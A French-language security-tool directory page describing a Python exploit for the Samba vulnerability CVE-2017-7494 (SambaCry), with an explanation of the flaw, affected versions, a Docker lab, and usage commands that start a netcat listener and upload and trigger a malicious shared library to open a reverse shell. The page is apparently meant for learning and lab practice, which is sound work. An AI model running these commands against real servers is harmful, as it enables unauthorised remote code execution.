Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-7494 — Exploit Python pour CVE-2017-7494 (SambaCry) démontrant l'exécution de code à distance authentifiée en téléversant une bibliothèque partagée malveillante sur un partage Samba et en déclenchant son chargement via dlopen. | Kitploit
Outils/GitHubGitHub/yonliud/cve-2017-7494
Analyse des VulnérabilitésExploitationApprentissage et ÉducationLabs et Pratique
GitHubyonliud/cve-2017-7494

CVE-2017-7494

Exploit Python pour CVE-2017-7494 (SambaCry) démontrant l'exécution de code à distance authentifiée en téléversant une bibliothèque partagée malveillante sur un partage Samba et en déclenchant son chargement via dlopen.

Voir le dépôt
2il y a 6 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit SambaCry (CVE-2017-7494)

CVE-2017-7494/SambaCry permet aux utilisateurs authentifiés de téléverser une bibliothèque partagée dans un dossier accessible en écriture, puis de mener une attaque par exécution en utilisant les bibliothèques téléversées.

Explication de la vulnérabilité

SambaCry est une vulnérabilité de validation de chemin dans la manière dont Samba gère les requêtes de named-pipe. En général, ces pipes sont utilisés pour permettre aux programmes de communiquer entre eux en lisant et en écrivant des données via un canal de type fichier.

Lorsque Samba reçoit un nom de pipe inconnu, les versions vulnérables peuvent le traiter comme le nom d'un module chargeable dynamiquement. Ces modules sont généralement des bibliothèques .so légitimes installées par l'administrateur.

La vulnérabilité permet à un client de fournir un chemin absolu du système de fichiers au lieu d'un nom de module ou de pipe normal. Samba ne restreint pas correctement ce chemin et peut effectivement exécuter : dlopen("/data/example.so", ...);.

Le chargement d'une bibliothèque partagée exécute son code d'initialisation. Par conséquent, un attaquant capable de téléverser un fichier .so malveillant dans un emplacement accessible en écriture peut ensuite forcer le service Samba à le charger, ce qui entraîne une exécution de code à distance.

Démo

https://github.com/user-attachments/assets/270c6725-708d-4e72-996a-b6c40e77f010

Utilisation

  1. Initialisez un écouteur :
root@kitploit:~
nc -lvnp 4444
  1. Exécutez le processus complet
root@kitploit:~
python3 exploit.py --url //127.0.0.1/data --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --lhost 172.26.242.223 --lport 4444 --remote-path /data/payload.so

Pour déclencher un payload déjà téléversé :

root@kitploit:~
python3 exploit.py --stages trigger --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --remote-path /data/payload.so
  1. Dans le terminal de l'écouteur, un shell devrait apparaître.

Environnement de laboratoire

Utilisez le docker-compose.yml préconfiguré pour initialiser le laboratoire vulnérable.

root@kitploit:~
docker compose up -d

Le laboratoire utilise Samba 4.5.9, qui est vulnérable à cette faille.

Versions concernées

3.5.0 - 4.4.13 4.5.0 - 4.5.9 4.6.0 - 4.6.3

Télécharger l’outil